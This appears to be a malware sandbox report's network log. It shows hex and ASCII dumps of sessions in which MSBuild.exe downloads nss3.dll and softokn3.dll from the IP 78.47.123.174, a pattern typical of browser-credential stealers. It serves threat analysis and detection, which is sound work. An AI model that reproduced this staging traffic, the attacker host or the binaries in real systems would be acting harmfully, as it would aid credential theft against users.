                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                        Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                        Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                        Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                        2024-05-24 08:27:23 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                        Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.44975978.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:24 UTC170OUTGET /nss3.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:24 UTC248INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:24 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 2046288
                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                        Connection: close
                                                                                        ETag: "6315a9f4-1f3950"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:24 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                        2024-05-24 08:27:24 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                        Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                        2024-05-24 08:27:24 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                        Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                        2024-05-24 08:27:24 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                        Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
                                                                                        2024-05-24 08:27:25 UTC16384INData Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83
                                                                                        Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
                                                                                        2024-05-24 08:27:25 UTC16384INData Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb
                                                                                        Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
                                                                                        2024-05-24 08:27:25 UTC16384INData Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00
                                                                                        Data Ascii: h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
                                                                                        2024-05-24 08:27:25 UTC16384INData Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d
                                                                                        Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
                                                                                        2024-05-24 08:27:25 UTC16384INData Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02
                                                                                        Data Ascii: WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
                                                                                        2024-05-24 08:27:25 UTC16384INData Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9
                                                                                        Data Ascii: D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.44976078.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:27 UTC174OUTGET /softokn3.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:27 UTC246INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:27 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 257872
                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                        Connection: close
                                                                                        ETag: "6315a9f4-3ef50"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:27 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7
                                                                                        Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(^_[]]
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8
                                                                                        Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71
                                                                                        Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                        Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                        2024-05-24 08:27:27 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
